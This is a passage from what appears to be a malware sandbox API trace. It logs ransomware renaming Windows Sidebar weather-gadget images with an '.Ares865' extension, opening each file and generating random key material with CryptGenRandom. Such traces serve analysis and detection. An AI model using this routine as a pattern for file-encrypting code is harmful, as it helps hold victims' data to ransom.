sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-gibbous.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-gibbous.png.ares865"), dwFlags=0x1) returned 1 [0116.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-gibbous.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.832] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19536) returned 1 [0116.832] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.833] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.833] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.836] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.837] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.837] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.837] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png.Ares865") returned 129 [0116.837] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.839] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.839] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25122) returned 1 [0116.839] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.840] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.840] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.843] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.844] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.844] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.844] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_rainy.png.Ares865") returned 101 [0116.844] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_rainy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_rainy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_rainy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_rainy.png.ares865"), dwFlags=0x1) returned 1 [0116.846] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_rainy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_rainy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.846] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=38125) returned 1 [0116.847] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.847] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.847] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.851] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.852] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.852] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.853] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_snow.png.Ares865") returned 100 [0116.853] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_snow.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_snow.png.ares865"), dwFlags=0x1) returned 1 [0116.854] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_snow.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.854] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37260) returned 1 [0116.854] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.855] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.855] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.861] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.862] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.862] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.863] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_thunderstorm.png.Ares865") returned 108 [0116.863] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_thunderstorm.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_thunderstorm.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_thunderstorm.png.ares865"), dwFlags=0x1) returned 1 [0116.865] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_thunderstorm.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_thunderstorm.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31296) returned 1 [0116.865] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.866] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.866] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.869] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.870] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.870] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.871] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_windy.png.Ares865") returned 101 [0116.871] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_windy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_windy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_windy.png.ares865"), dwFlags=0x1) returned 1 [0116.872] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_windy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_windy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.873] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=39992) returned 1 [0116.873] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.874] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.874] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.878] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.878] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.878] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.879] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_partly-cloudy.png.Ares865") returned 108 [0116.879] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.881] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.881] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27357) returned 1 [0116.881] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.882] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.882] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.885] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.886] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.886] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.887] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_snow.png.Ares865") returned 99 [0116.887] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_snow.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_snow.png.ares865"), dwFlags=0x1) returned 1 [0116.888] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_snow.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.888] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41932) returned 1 [0116.888] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.889] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.889] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.895] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.895] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.895] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.896] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_sun.png.Ares865") returned 98 [0116.897] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_sun.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_sun.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_sun.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_sun.png.ares865"), dwFlags=0x1) returned 1 [0116.899] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_sun.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_sun.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.899] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36702) returned 1 [0116.899] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.900] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.900] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.906] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.907] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.907] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.908] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_windy.png.Ares865") returned 100 [0116.908] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_windy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_windy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_windy.png.ares865"), dwFlags=0x1) returned 1 [0116.909] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_windy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_windy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.910] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=48212) returned 1 [0116.910] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.911] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.911] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.915] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.916] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.916] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.917] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_cloudy.png.Ares865") returned 101 [0116.917] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.919] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.920] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=33156) returned 1 [0116.920] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.920] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.920] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.930] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.930] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.930] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.931] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_few-showers.png.Ares865") returned 106 [0116.931] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_few-showers.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_few-showers.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_few-showers.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_few-showers.png.ares865"), dwFlags=0x1) returned 1 [0116.932] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_few-showers.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_few-showers.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.933] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=33872) returned 1 [0116.933] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.934] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.934] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.938] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.939] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.939] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.940] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_foggy.png.Ares865") returned 100 [0116.940] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_foggy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_foggy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_foggy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_foggy.png.ares865"), dwFlags=0x1) returned 1 [0116.942] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_foggy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_foggy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.942] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35133) returned 1 [0116.942] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.943] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.943] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.948] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.949] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.949] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.950] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_hail.png.Ares865") returned 99 [0116.950] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_hail.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_hail.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_hail.png.Ares865" (normalized: "c:\\program files (x86)\\windows 